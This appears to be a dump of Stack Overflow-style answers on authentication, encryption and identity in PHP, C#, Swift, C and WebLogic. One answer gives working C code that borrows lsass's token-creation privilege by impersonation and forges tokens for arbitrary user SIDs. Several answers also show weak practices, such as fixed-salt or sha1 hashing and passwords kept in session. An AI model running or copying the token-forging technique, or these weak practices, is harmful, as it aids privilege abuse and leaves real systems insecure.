text
stringlengths
64
2.99M
PHP provides built-in solutions for encrypting and decrypting data. Use e.g. MCrypt, supports a good buffet of common algorithms. What exact cipher you choose is up to you, depending on the level of security required. Read up at Wikipedia on block ciphers for the general picture. Edit: Just learned that MCrypt is deprecated in PHP 7.1 and the use of OpenSSL is recommended in its place. If the phone numbers must be inaccessible even if a hacker gains complete access to your system, then the decrypt key must obviously be off-server, ie. you can't store it in DB or the filesystem. In the spec you have, this key would then be the e-mail address that's matched with the phone number. Then, at input time you'd one-way hash the e-mail, and use the unhashed e-mail as a key for encrypting the phone number. At request time, you'd find the matching phone number by using the e-mail hash, and decrypt it using the unhashed email as the key. Should get you sorted. Update: When fetching a record that matches the phone/email pair in the database, if you've used password_hash() (which generates a new salt and a unique string each time), then your only option is to fetch all records and iterate them through password_verify(). That's not particularly scalable. Unless this is an exercise in security, I'm not sure I'd bother with more than a simple sha1() hash for the e-mails. Or use e.g. crypt($email, '$2y$08$Some22CharsOfFixedSalt$'); -- see crypt() -- and generate a blowfish-based hash that uses a fixed salt string, resulting in an invariant hash. I'd also then truncate the leading salt-part of the resulting string from the database entry. If you're feeling crafty, why not cook up an algorithm that derives a unique string from each email, and then use that for salt in your hashing function, instead of using the same salt for hashing all e-mails. You could also delegate the e-mail hashing for the database and use MySQL's encryption functions. Then you'd use e.g. SHA2('email', 256) in your INSERT and SELECT queries, like so: INSERT INTO records VALUES (SHA2('email@what', 256), 'TheEncryptedTelNo'); and SELECT * FROM records WHERE email = SHA2('email@what', 256);. (Be sure to note the manual's caution on plaintext data possibly getting stored in logs; ie. know your MySQL setup before doing this.)
Information about local user profiles is stored in this Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList It is possible to enumerate it subkeys, where each subkey has a ProfileImagePath that points to the folder where ntuser.dat is located. But, directly loading a user profile by RegLoadKey() is very bad. First, the profile may already be loaded. Second, it is possible that after you load the profile yourself, the system may also try loading the profile. Note the RefCount value. The system uses that value to load the profile if it is not already loaded, incrementing RefCount. And UnloadUserProfile() decrements RefCount and unloads the profile only when it become 0 by calling RegUnLoadKey(). So all profile load/unload operations must be synchronized. There is only one correct way to load a profile - call LoadUserProfile(). (internally it performs a RPC call to profsvc.LoadUserProfileServer in svchost.exe -k netsvcs, where all synchronization is done). So how do you get the user token for LoadUserProfile() ? I guess call LogonUser(), which you said you do not want to do (and cannot unless you have the user's password). But, there does exist another way that works (I tested this), but it is undocumented. LoadUserProfile used only the user Sid from token (query for TOKEN_USER information with TokenUser iformation class) and then work with HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<Sid> key It is possible to create a token by calling ZwCreateToken() with any given SID, but for this call you need SE_CREATE_TOKEN_PRIVILEGE. This priviledge exists only in the lsass.exe process. So a possible solution is: open lsass.exe and get its token, or impersonate its thread. enable SE_CREATE_TOKEN_PRIVILEGE in the token, after impersonation enumerate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList, and for each subkey query its Sid value, or (if Sid does not exist) convert the subkey name to a SID using ConvertStringSidToSid() create a token with that SID and finally call LoadUserProfile() -------------- EDIT code example by request ---------------------------- code used ntdll export (which somebody here very not like) but as is we need got SE_CREATE_TOKEN_PRIVILEGE to create token by yourself in future enum processes in the system, open token for every process, look are SE_CREATE_TOKEN_PRIVILEGE exist in token, if yes - duplicate this token and if need enable SE_CREATE_TOKEN_PRIVILEGE in it. finally impersonate with duplicated token BOOL g_IsXP;// true if we on winXP, false otherwise static volatile UCHAR guz; static OBJECT_ATTRIBUTES zoa = { sizeof(zoa) }; NTSTATUS ImpersonateIfConformToken(HANDLE hToken) { ULONG cb = 0, rcb = 0x200; PVOID stack = alloca(guz); union { PVOID buf; PTOKEN_PRIVILEGES ptp; }; NTSTATUS status; do { if (cb < rcb) { cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack); } if (0 <= (status = ZwQueryInformationToken(hToken, TokenPrivileges, buf, cb, &rcb))) { if (ULONG PrivilegeCount = ptp->PrivilegeCount) { PLUID_AND_ATTRIBUTES Privileges = ptp->Privileges; do { if (Privileges->Luid.LowPart == SE_CREATE_TOKEN_PRIVILEGE && !Privileges->Luid.HighPart) { static SECURITY_QUALITY_OF_SERVICE sqos = { sizeof sqos, SecurityImpersonation, SECURITY_DYNAMIC_TRACKING, FALSE }; static OBJECT_ATTRIBUTES soa = { sizeof(soa), 0, 0, 0, 0, &sqos }; if (0 <= (status = ZwDuplicateToken(hToken, TOKEN_ADJUST_PRIVILEGES|TOKEN_IMPERSONATE, &soa, FALSE, TokenImpersonation, &hToken))) { if (Privileges->Attributes & SE_PRIVILEGE_ENABLED) { status = STATUS_SUCCESS; } else { static TOKEN_PRIVILEGES tp = { 1, { { { SE_CREATE_TOKEN_PRIVILEGE }, SE_PRIVILEGE_ENABLED } } }; status = ZwAdjustPrivilegesToken(hToken, FALSE, &tp, 0, 0, 0); } if (status == STATUS_SUCCESS) { status = ZwSetInformationThread(NtCurrentThread(), ThreadImpersonationToken, &hToken, sizeof(HANDLE)); } ZwClose(hToken); } return status; } } while (Privileges++, --PrivilegeCount); } return STATUS_PRIVILEGE_NOT_HELD; } } while (status == STATUS_BUFFER_TOO_SMALL); return status; } NTSTATUS GetCreateTokenPrivilege() { BOOLEAN b; RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &b); ULONG cb = 0, rcb = 0x10000; PVOID stack = alloca(guz); union { PVOID buf; PBYTE pb; PSYSTEM_PROCESS_INFORMATION pspi; }; NTSTATUS status; do { if (cb < rcb) { cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack); } if (0 <= (status = ZwQuerySystemInformation(SystemProcessInformation, buf, cb, &rcb))) { status = STATUS_UNSUCCESSFUL; ULONG NextEntryOffset = 0; do { pb += NextEntryOffset; if (pspi->InheritedFromUniqueProcessId && pspi->UniqueProcessId) { CLIENT_ID cid = { pspi->UniqueProcessId }; NTSTATUS s = STATUS_UNSUCCESSFUL; HANDLE hProcess, hToken; if (0 <= ZwOpenProcess(&hProcess, g_IsXP ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION, &zoa, &cid)) { if (0 <= ZwOpenProcessToken(hProcess, TOKEN_DUPLICATE|TOKEN_QUERY, &hToken)) { s = ImpersonateIfConformToken(hToken); NtClose(hToken); } NtClose(hProcess); } if (s == STATUS_SUCCESS) { return STATUS_SUCCESS; } } } while (NextEntryOffset = pspi->NextEntryOffset); return status; } } while (status == STATUS_INFO_LENGTH_MISMATCH); return STATUS_UNSUCCESSFUL; } if we have SE_CREATE_TOKEN_PRIVILEGE - we can create token ! NTSTATUS CreateUserToken(PHANDLE phToken, PSID Sid) { HANDLE hToken; TOKEN_STATISTICS ts; NTSTATUS status = ZwOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken); if (0 <= status) { if (0 <= (status = ZwQueryInformationToken(hToken, TokenStatistics, &ts, sizeof(ts), &ts.DynamicCharged))) { ULONG cb = 0, rcb = 0x200; PVOID stack = alloca(guz); union { PVOID buf; PTOKEN_PRIVILEGES ptp; }; do { if (cb < rcb) { cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack); } if (0 <= (status = ZwQueryInformationToken(hToken, TokenPrivileges, buf, cb, &rcb))) { TOKEN_USER User = { { Sid } }; static TOKEN_SOURCE Source = { {' ','U','s','e','r','3','2', ' '} }; static TOKEN_DEFAULT_DACL tdd;// 0 default DACL static TOKEN_GROUPS Groups;// no groups static SECURITY_QUALITY_OF_SERVICE sqos = { sizeof sqos, SecurityImpersonation, SECURITY_DYNAMIC_TRACKING }; static OBJECT_ATTRIBUTES oa = { sizeof oa, 0, 0, 0, 0, &sqos }; status = ZwCreateToken(phToken, TOKEN_ALL_ACCESS, &oa, TokenPrimary, &ts.AuthenticationId, &ts.ExpirationTime, &User, &Groups, ptp, (PTOKEN_OWNER)&Sid, (PTOKEN_PRIMARY_GROUP)&Sid, &tdd, &Source); break; } } while (status == STATUS_BUFFER_TOO_SMALL); } ZwClose(hToken); } return status; } and finally enumerate and load/unload user profiles void EnumProf() { PROFILEINFO pi = { sizeof(pi), PI_NOUI }; pi.lpUserName = L"*"; STATIC_OBJECT_ATTRIBUTES(soa, "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList"); HANDLE hKey; if (0 <= ZwOpenKey(&hKey, KEY_READ, &soa)) { PVOID stack = alloca(sizeof(WCHAR)); union { PVOID buf; PKEY_BASIC_INFORMATION pkbi; PKEY_VALUE_PARTIAL_INFORMATION pkvpi; } u = {}; DWORD cb = 0, rcb = 64; NTSTATUS status; ULONG Index = 0; do { do { if (cb < rcb) { cb = RtlPointerToOffset(u.buf = alloca(rcb - cb), stack); } if (0 <= (status = ZwEnumerateKey(hKey, Index, KeyBasicInformation, u.buf, cb, &rcb))) { *(PWSTR)RtlOffsetToPointer(u.pkbi->Name, u.pkbi->NameLength) = 0; PSID Sid; if (ConvertStringSidToSidW(u.pkbi->Name, &Sid)) { HANDLE hToken; if (0 <= CreateUserToken(&hToken, Sid)) { if (LoadUserProfile(hToken, &pi)) { UnloadUserProfile(hToken, pi.hProfile); } NtClose(hToken); } LocalFree(Sid); } } } while (status == STATUS_BUFFER_OVERFLOW); Index++; } while (0 <= status); ZwClose(hKey); } }
I created an example as a custom middleware for your case (rather than a filter). Here is how you could use the standard API for Identity, even with your custom requierements. I only coded the part about using the identity. You'll have to provide the custom part. public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory) { loggerFactory.AddConsole(Configuration.GetSection("Logging")); loggerFactory.AddDebug(); //Custom authentication middleware. app.Use(async (context, next) => { //Validate security here and proceed to the next line if everything is ok. //Replace the parameter with the username from the request. context.User = new System.Security.Claims.ClaimsPrincipal(new GenericIdentity("MyUser")); //Will return true. Console.WriteLine("Is authenticated: ${context.User.Identity.IsAuthenticated}"); await next(); }); app.UseMvc(); } This code will allow you to use the standard Authorize filter on your controllers. However, I would still try to convince your boss that JWT Tokens are the way to go. They are standard, secure, and better for performance since you don't have to validate the user's data against a database every single call. A custom solution in the security area is usually a solution with easy vulnerabilities to exploit. Good luck in your implementation.
The C language has no native support for arbitrary-precision integer ("bignum") arithmetic, so you will either have to use a library that provides it (I've heard that GMP is a popular choice) or write your own code to handle it. If you choose the do-it-yourself path, I would recommend representing your numbers as arrays of some reasonably large native unsigned integer type (e.g. uint32_t or uint64_t), with each array element representing a digit in base 2k, where k is the number of bits in the underlying native integers. For RSA, you don't need to worry about representing negative values, since all the math is done with numbers ranging from 0 up to the RSA modulus n. If you want, you can also take advantage of the upper limit n to fix the number of base 2k digits used for all the values in a particular RSA instance, so that you don't have to explicitly store it alongside each digit array. Ps. Note that "textbook RSA" is not a secure encryption scheme by itself. To make it semantically secure, you need to also include a suitable randomized padding scheme such as OAEP. Also, padded or not, normal RSA can only encrypt messages shorter than the modulus, minus the length taken up by padding, if any. To encrypt longer messages, the standard solution is to use hybrid encryption, where you first encrypt the message using a symmetric encryption scheme (I would recommend AES-SIV) with a random key, and then encrypt the key with RSA.
I started to use this solution and polished it a little bit, and I came to a pretty handy solution. I created a custom class named FirebaseAPI. This is a singleton class. This class contains all the methods for Firebase (Authentication, Database, Storage, ...). Example: FirebaseAPI.swift import FirebaseAuth import FirebaseDatabase class FirebaseAPI { static let shared = FirebaseAPI() private init() {} //Authentication func logInUser(onCompletion: @escaping (String?) -> Void { FIRAuth.auth().signInAnonymously(completion: {(user, error) in if error == nil { onCompletion(user!.uid) } else { onCompletion(nil) } }) } //Database func getObjects(parameter: ParamaterClass, onCompletion: @escaping ([ObjectClass]) -> Void) { Constants.Firebase.References.Object?.observe(.value, with: { snapshot in var objects = [ObjectClass]() if snapshot.exists() { for child in snapshot.children.allObjects { let object = Object(snapshot: child as! FIRDataSnapshot) objects.append(object) } } onCompletion(objects) }) } } Constants.swift import FirebaseDatabase struct Constants { struct Firebase { static var CurrentUser: FIRDatabaseReference? static var Objects: FIRDatabaseReference? } } AppDelegate.swift import UIKit import Firebase @UIApplicationMain class AppDelegate: UIResponder, UIApplicationDelegate { var window: UIWindow? func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool { FIRApp.configure() FirebaseAPI.shared.logInUser(onCompletion { uid in if uid != nil { Constants.Firebase.References.CurrentUser = FIRDatabase.database().reference().child("users").child(uid!) Constants.Firebase.References.CurrentUser.keepSynced(true) Constants.Firebase.References.Objects = FIRDatabase.database().reference().child("objects") Constants.Firebase.Reference.Objects?.keepSynced(true) } }) } return true } I can give you a example of calling methods in the FirebaseAPI in a ViewController, but an example of such a method is given in the code of the AppDelegate.swift up here (the FirebaseAPI.shared.logInUser method). Used this structure in 3 different projects up till now and it works fluently!
I think it is quite dangerous to allow the client to decrypt the token. If they can do that, a malicious actor can modify the token and the claims inside. If you don't check the validity of the claims (perhaps because they are provided by a third party) then that could lead to privilege escalation and compromise of your application. If the client application requires the claims - perhaps for UI layout, then you can supply them separately to the token. One way to do this would be via an ActionFilterAttribute to write the claims to a custom http header. If the claims are tampered with here, it only affects the client, as you will check the secure claims inside the token before processing any request. public AddClaimsAttribute : System.Web.Http.Filters.ActionFilterAttribute { var principal = actionExecutedContext.ActionContext.RequestContext.Principal as ClaimsPrincipal; if (principal != null) { var claims = principal.Claims.Select(x => x.Type + ":" + x.Value).ToList(); actionExecutedContext.Response.Content.Headers.Add("Claims", String.Join(",", claims)); } } Your client then just needs to check for this header and parse it. This is a basic example, you could format it as JSON or add a series of custom headers "IsAdmin", "IsEditingUser" etc. Because it is a filter, you could apply this globally to every request, to every action on a controller or to a specific action as you need it.
What I need is to not only return the claims serialized in the access_token but to return them in the response like this: While I encourage you to store these claims in identity tokens - so that they can be easily read by the client in a completely standard way, it's possible in OpenIddict 1.0 and 2.0 RTM. For that, you have 2 options: Using a special "public" property (in your authorization controller, where authentication tickets are created): ticket.SetProperty("custom_claim" + OpenIddictConstants.PropertyTypes.String, user.Id); Note: OpenIddictConstants.PropertyTypes.String is a special suffix indicating the authentication property added to the ticket can be exposed as part of the token response. Other constants are available if you prefer returning your claim as a JSON number or a more complex JSON structure. Using the events model (in Startup.cs): services.AddOpenIddict() // Register the OpenIddict core services. .AddCore(options => { // ... }) // Register the OpenIddict server handler. .AddServer(options => { // ... options.AddEventHandler<OpenIddictServerEvents.ApplyTokenResponse>( notification => { if (string.IsNullOrEmpty(notification.Context.Error)) { var principal = notification.Context.Ticket.Principal; var response = notification.Context.Response; response["custom_claim"] = principal.FindFirst("your_claim_attached_to_the_principal").Value; } return Task.FromResult(OpenIddictServerEventState.Unhandled); }); }) // Register the OpenIddict validation handler. .AddValidation();
The Google API Client Library for .NET does not support UWP by now. So we can't use Google.Apis.Calendar.v3 Client Library in UWP apps now. For more info, please see the similar question: Universal Windows Platform App with google calendar. To use Google Calendar API in UWP, we can call it through REST API. To use the REST API, we need to authorize requests first. For how to authorize requests, please see Authorizing Requests to the Google Calendar API and Using OAuth 2.0 for Mobile and Desktop Applications. After we have the access token, we can call Calendar API like following: var clientId = "{Your Client Id}"; var redirectURI = "pw.oauth2:/oauth2redirect"; var scope = "https://www.googleapis.com/auth/calendar.readonly"; var SpotifyUrl = $"https://accounts.google.com/o/oauth2/auth?client_id={clientId}&redirect_uri={Uri.EscapeDataString(redirectURI)}&response_type=code&scope={Uri.EscapeDataString(scope)}"; var StartUri = new Uri(SpotifyUrl); var EndUri = new Uri(redirectURI); // Get Authorization code WebAuthenticationResult WebAuthenticationResult = await WebAuthenticationBroker.AuthenticateAsync(WebAuthenticationOptions.None, StartUri, EndUri); if (WebAuthenticationResult.ResponseStatus == WebAuthenticationStatus.Success) { var decoder = new WwwFormUrlDecoder(new Uri(WebAuthenticationResult.ResponseData).Query); if (decoder[0].Name != "code") { System.Diagnostics.Debug.WriteLine($"OAuth authorization error: {decoder.GetFirstValueByName("error")}."); return; } var autorizationCode = decoder.GetFirstValueByName("code"); //Get Access Token var pairs = new Dictionary<string, string>(); pairs.Add("code", autorizationCode); pairs.Add("client_id", clientId); pairs.Add("redirect_uri", redirectURI); pairs.Add("grant_type", "authorization_code"); var formContent = new Windows.Web.Http.HttpFormUrlEncodedContent(pairs); var client = new Windows.Web.Http.HttpClient(); var httpResponseMessage = await client.PostAsync(new Uri("https://www.googleapis.com/oauth2/v4/token"), formContent); if (!httpResponseMessage.IsSuccessStatusCode) { System.Diagnostics.Debug.WriteLine($"OAuth authorization error: {httpResponseMessage.StatusCode}."); return; } string jsonString = await httpResponseMessage.Content.ReadAsStringAsync(); var jsonObject = Windows.Data.Json.JsonObject.Parse(jsonString); var accessToken = jsonObject["access_token"].GetString(); //Call Google Calendar API using (var httpRequest = new Windows.Web.Http.HttpRequestMessage()) { string calendarAPI = "https://www.googleapis.com/calendar/v3/users/me/calendarList"; httpRequest.Method = Windows.Web.Http.HttpMethod.Get; httpRequest.RequestUri = new Uri(calendarAPI); httpRequest.Headers.Authorization = new Windows.Web.Http.Headers.HttpCredentialsHeaderValue("Bearer", accessToken); var response = await client.SendRequestAsync(httpRequest); if (response.IsSuccessStatusCode) { var listString = await response.Content.ReadAsStringAsync(); //TODO } } }
According to your question, I going to provide a solution assuming some things: First, I've created three databases in my local SQL Server instance: create database CompanyFoo go create database CompanyBar go create database CompanyZaz go Then, I going to create one table with one row in each database: use CompanyFoo go drop table ConfigurationValue go create table ConfigurationValue ( Id int not null identity(1, 1), Name varchar(255) not null, [Desc] varchar(max) not null ) go insert into ConfigurationValue values ('Company name', 'Foo Company') go use CompanyBar go drop table ConfigurationValue go create table ConfigurationValue ( Id int not null identity(1, 1), Name varchar(255) not null, [Desc] varchar(max) not null ) go insert into ConfigurationValue values ('Company name', 'Bar Company') go use CompanyZaz go drop table ConfigurationValue go create table ConfigurationValue ( Id int not null identity(1, 1), Name varchar(255) not null, [Desc] varchar(max) not null ) go insert into ConfigurationValue values ('Company name', 'Zaz Company') go Next step is create an user with SQL Authentication and grant access to read the databases, in my case my user name is johnd and password is 123. Once we have these steps completed, we proceed to create an MVC application in ASP.NET Core, I used MultipleCompany as project name, I have two controllers: Home and Administration, the goal is to show a login view first and then redirect to another view to show data according to selected database in "login" view. To accomplish your requirement, you'll need to use session on ASP.NET Core application you can change this way to storage and read data later, for now this is for concept test only. HomeController code: using Microsoft.AspNetCore.Http; using Microsoft.AspNetCore.Mvc; using MultipleCompany.Models; namespace MultipleCompany.Controllers { public class HomeController : Controller { public IActionResult Index() { return View(); } [HttpPost] public IActionResult Index(LoginModel model) { HttpContext.Session.SetString("CompanyCode", model.CompanyCode); HttpContext.Session.SetString("UserName", model.UserName); HttpContext.Session.SetString("Password", model.Password); return RedirectToAction("Index", "Administration"); } public IActionResult Error() { return View(); } } } AdministrationController code: using System.Linq; using Microsoft.AspNetCore.Http; using Microsoft.AspNetCore.Mvc; using Microsoft.AspNetCore.Mvc.Filters; using MultipleCompany.Models; using MultipleCompany.Services; namespace MultipleCompany.Controllers { public class AdministrationController : Controller { protected IDbContextService DbContextService; protected CompanyDbContext DbContext; public AdministrationController(IDbContextService dbContextService) { DbContextService = dbContextService; } public override void OnActionExecuting(ActionExecutingContext context) { DbContext = DbContextService.CreateCompanyDbContext(HttpContext.Session.CreateLoginModelFromSession()); base.OnActionExecuting(context); } public IActionResult Index() { var model = DbContext.ConfigurationValue.ToList(); return View(model); } } } Code for Home view: @{ ViewData["Title"] = "Home Page"; } <form action="/home" method="post"> <fieldset> <legend>Log in</legend> <div> <label for="CompanyCode">Company code</label> <select name="CompanyCode"> <option value="CompanyFoo">Foo</option> <option value="CompanyBar">Bar</option> <option value="CompanyZaz">Zaz</option> </select> </div> <div> <label for="UserName">User name</label> <input type="text" name="UserName" /> </div> <div> <label for="Password">Password</label> <input type="password" name="Password" /> </div> <button type="submit">Log in</button> </fieldset> </form> Code for Administration view: @{ ViewData["Title"] = "Home Page"; } <h1>Welcome!</h1> <table class="table"> <tr> <th>Name</th> <th>Desc</th> </tr> @foreach (var item in Model) { <tr> <td>@item.Name</td> <td>@item.Desc</td> </tr> } </table> LoginModel code: using System; using Microsoft.AspNetCore.Http; namespace MultipleCompany.Models { public class LoginModel { public String CompanyCode { get; set; } public String UserName { get; set; } public String Password { get; set; } } public static class LoginModelExtensions { public static LoginModel CreateLoginModelFromSession(this ISession session) { var companyCode = session.GetString("CompanyCode"); var userName = session.GetString("UserName"); var password = session.GetString("Password"); return new LoginModel { CompanyCode = companyCode, UserName = userName, Password = password }; } } } CompanyDbContext code: using System; using Microsoft.EntityFrameworkCore; namespace MultipleCompany.Models { public class CompanyDbContext : Microsoft.EntityFrameworkCore.DbContext { public CompanyDbContext(String connectionString) { ConnectionString = connectionString; } public String ConnectionString { get; } protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder) { optionsBuilder.UseSqlServer(ConnectionString); base.OnConfiguring(optionsBuilder); } protected override void OnModelCreating(ModelBuilder modelBuilder) { base.OnModelCreating(modelBuilder); } public DbSet<ConfigurationValue> ConfigurationValue { get; set; } } } ConfigurationValue code: using System; namespace MultipleCompany.Models { public class ConfigurationValue { public Int32? Id { get; set; } public String Name { get; set; } public String Desc { get; set; } } } AppSettings code: using System; namespace MultipleCompany.Models { public class AppSettings { public String CompanyConnectionString { get; set; } } } IDbContextService code: using MultipleCompany.Models; namespace MultipleCompany.Services { public interface IDbContextService { CompanyDbContext CreateCompanyDbContext(LoginModel model); } } DbContextService code: using System; using Microsoft.Extensions.Options; using MultipleCompany.Models; namespace MultipleCompany.Services { public class DbContextService : IDbContextService { public DbContextService(IOptions<AppSettings> appSettings) { ConnectionString = appSettings.Value.CompanyConnectionString; } public String ConnectionString { get; } public CompanyDbContext CreateCompanyDbContext(LoginModel model) { var connectionString = ConnectionString.Replace("{database}", model.CompanyCode).Replace("{user id}", model.UserName).Replace("{password}", model.Password); var dbContext = new CompanyDbContext(connectionString); return dbContext; } } } Startup code: using Microsoft.AspNetCore.Builder; using Microsoft.AspNetCore.Hosting; using Microsoft.Extensions.Configuration; using Microsoft.Extensions.DependencyInjection; using Microsoft.Extensions.Logging; using MultipleCompany.Models; using MultipleCompany.Services; namespace MultipleCompany { public class Startup { public Startup(IHostingEnvironment env) { var builder = new ConfigurationBuilder() .SetBasePath(env.ContentRootPath) .AddJsonFile("appsettings.json", optional: true, reloadOnChange: true) .AddJsonFile($"appsettings.{env.EnvironmentName}.json", optional: true) .AddEnvironmentVariables(); Configuration = builder.Build(); } public IConfigurationRoot Configuration { get; } // This method gets called by the runtime. Use this method to add services to the container. public void ConfigureServices(IServiceCollection services) { // Add framework services. services.AddMvc(); services.AddEntityFrameworkSqlServer().AddDbContext<CompanyDbContext>(); services.AddScoped<IDbContextService, DbContextService>(); services.AddDistributedMemoryCache(); services.AddSession(); services.AddOptions(); services.Configure<AppSettings>(Configuration.GetSection("AppSettings")); services.AddSingleton<IConfiguration>(Configuration); } // This method gets called by the runtime. Use this method to configure the HTTP request pipeline. public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory) { loggerFactory.AddConsole(Configuration.GetSection("Logging")); loggerFactory.AddDebug(); if (env.IsDevelopment()) { app.UseDeveloperExceptionPage(); app.UseBrowserLink(); } else { app.UseExceptionHandler("/Home/Error"); } app.UseStaticFiles(); app.UseSession(); app.UseMvc(routes => { routes.MapRoute( name: "default", template: "{controller=Home}/{action=Index}/{id?}"); }); } } } I've added this packages for my project: "Microsoft.EntityFrameworkCore": "1.0.1", "Microsoft.EntityFrameworkCore.SqlServer": "1.0.1", "Microsoft.AspNetCore.Session": "1.0.0" My appsettings.json file: { "Logging": { "IncludeScopes": false, "LogLevel": { "Default": "Debug", "System": "Information", "Microsoft": "Information" } }, "AppSettings": { "CompanyConnectionString": "server=(local);database={database};user id={user id};password={password}" } } Please get focus on the concept about to connect to selected database in home view, you can change any part of this code as an improvement, please remember I'm providing this solution making some assumptions according to your brief question, please feel free to ask about any exposed aspect in this solution to improve this piece of code according to your requirements. Basically, we need to define a service to create the instance of db context according to selected database, that's IDbContextService interface and DbContextService it's the implementation for that interface. As you can see on DbContextService code, we replace the values inside of {} to build different connection string, in this case I've added the database names in drop down list but in real development please avoid this way because for security reasons it's better to don't expose the real names of your databases and other configurations; you can have a parity table from controller's side to resolve the company code according to selected database. One improvement for this solution, it would be to add some code to serialize login model as json into session instead of store each value in separate way. Please let me know if this answer is useful. PD: Let me know in comments if you want the full code to upload in one drive
Disclaimer: I never used Keycloak, but the tag wiki says it's compliant with OAuth2 so I'll trust that information. At a really high-level view, you seem to have two requirements: authenticate actions triggered by an end user while he's using your system. authenticate actions triggered by your system at an unknown time and where there is no requirement for a end-user to be online. You already met the first one, by relying on a token-based authentication system and I would do exactly the same for the second point, the only difference would be that the tokens would be issued to your system using the OAuth2 client credentials grant instead of the other grants that are targeted at scenarios where there is an end-user. (source: Client Credentials Grant) In your case, Keycloak would play the role of Auth0 and your client applications are microservices which can maintain client secrets used to authenticate themselves in the authorization server and obtain access tokens. One thing to have in mind is that if your system relies on the sub claim for much more than authentication and authorization then you may need to make some adjustments. For example, I've seen systems where performing action A required to know that it was targeted at user X and Y, but the payload for the action only received user Y and assumed user X was the current authenticated principal. This works fine when everything is synchronous, but by merely switching the payload to specify both users would mean that the action could be done asynchronously by a system authenticated principal.
Where it effects? The enforce-valid-basic-auth-credentials flag effects the entire domain. So, it will work for both of your project. The enforce-valid-basic-auth-credentials flag is true by default, and WebLogic Server authentication is performed. If authentication fails, the request is rejected. WebLogic Server must therefore have knowledge of the user and password. You may want to change the default behavior if you rely on an alternate authentication mechanism. For example, you might use a backend web service to authenticate the client, and WebLogic Server does not need to know about the user. With the default authentication enforcement enabled, the web service can do its own authentication, but only if WebLogic Server authentication first succeeds. If you explicitly set the enforce-valid-basic-auth-credentials flag to false, WebLogic Server does not perform authentication for HTTP BASIC authentication client requests for which access control was not enabled for the target resource. Resource Link: Understanding BASIC Authentication with Unsecured Resources WebLogic bypass basic authentication What Oracle Says about enforce-valid-basic-auth-credentials? Oracle WebLogic Server authentication is enabled by default. However, this configuration prevents Oracle WebLogic Server from using application managed authentication. You must disable Oracle WebLogic Server authentication by setting the enforce-valid-basic-auth-credentials parameter to false. Procedure To disable Oracle WebLogic Server authentication: In a text editor, open the config.xml file for the domain where you deployed IBM CMIS for Content Manager OnDemand. The config.xml file is in the Oracle/Middleware/user_projects/domains/domain_name/config directory. Locate the <security-configuration> element. Add the following argument to the end of the element: <enforce-valid-basic-auth-credentials>false</enforce-valid-basic-auth -credentials> Start or restart all of the servers in the domain. Resource Link: Disabling Oracle WebLogic Server authentication for IBM CMIS for Content Manager OnDemand UPDATE#1: Why it is made to false? Whether or not the system should allow requests with invalid Basic Authentication credentials to access unsecure resources. (Interface=weblogic.management.configuration.SecurityConfigurationMBean Attribute=getEnforceValidBasicAuthCredentials) Actually, you need to do 2 things here. Sometimes it is not enough to make it false. So, you need to add the flag via WLST : connect('weblogicUser','weblogicPassword','t3://localhost:7001') edit() startEdit() cd('SecurityConfiguration/Your_Domain') set('EnforceValidBasicAuthCredentials','false') save() activate() N.B: (Do not forget to edit with your weblogicUser, weblogicPassword, weblogic url and your domain in the 'cd' command...). If you do this things successfully, then it will effect on your configuration file. Resolution: After restarting server, If you looked in the config.xml file, and another tag has been added. Now, config.xml file looks like that : ......... <enforce-valid-basic-auth-credentials>false</enforce-valid-basic-auth-credentials> <use-kss-for-demo>true</use-kss-for-demo> </security-configuration> ............ But this use-kss-for-demo tag may depend on your weblogic configuration. So It is strongly suggested by Val Bonn to use the WSLT way to update this flag. Resource Link: https://stackoverflow.com/a/39619242/2293534 UPDATE#2: So, you want to know that what is the impact? By default WebLogic Server looks at the Authentication Header, and even if your code and app is set to allow anonymous access, if there’s any HTTP Authentication header, WebLogic fails to handle the requests and throws up a browser login dialog: The Publisher web service by default uses authentication headers, so the Publisher authentication headers get sent to your portlet code. Fortunately, the fix for this is pretty straight-forward and documented to set enforce-valid-basic-auth-credentials to false. Resource Link: http://blog.integryst.com/webcenter-interaction/2010/03/24/setting-config-xml-for-weblogic-in-oracles-jdeveloper/
Authenticating with OAUTH flow within an office web add-ins is a known issue.The better explanation of the problem can be found here. Due to the popularity of clickjacking on the internet, it is common to prevent login pages from being display inside frames. The X-FRAME-Options meta tag in HTML makes it easy for providers to implement this safeguard on a widespread or domain/origin-specific basis. Pages that are not “frameable” will not load consistently in an Office add-in Therefore you need to rely on a popup mechanism. In one word, the authentication flow will be made on a popup to avoid iFraming problems. The link above is a little bit outdated because it states that popup is a necessary evil. Microsoft awares of this problem proposed recently the dialogAPI to overcome this problem. Let us get back to our Adal.js problem. I believe that you should stop using adal.js because it was not meant to be used in our add-in web context. Even if they implemented a popup technique. They do not use the dialogAPI when available. You should try to take benefit of this dialogAPI when available otherwise you will hit many problems (deactivated popup, security regions etc.). Your best option is to implement your own flow mechanism or use Office-js-helpers as explained in this response
The client identifier and your domain (which I'm assuming you're referring to the assigned Auth0 domain similar to [account].auth0.com) are both considered information that does not need to be kept secret. The domain represents the entity handling the authentication; the equivalent of accounts.google.com for your application. The client identifier is defined within the OAuth 2.0 specification which clearly indicates that is not confidential information: The client identifier is not a secret; it is exposed to the resource owner and MUST NOT be used alone for client authentication. In browser-based or other application where the actual code is located in a client environment it's unavoidable to have information stored there for authentication purposes. You just need to be sure that the information stored is okay to be disclosed like it is with the two examples you gave. On the other hand these types of application could not securely use a client secret as it is defined by OAuth 2.0, because like you said, anyone could see it by inspecting the code.
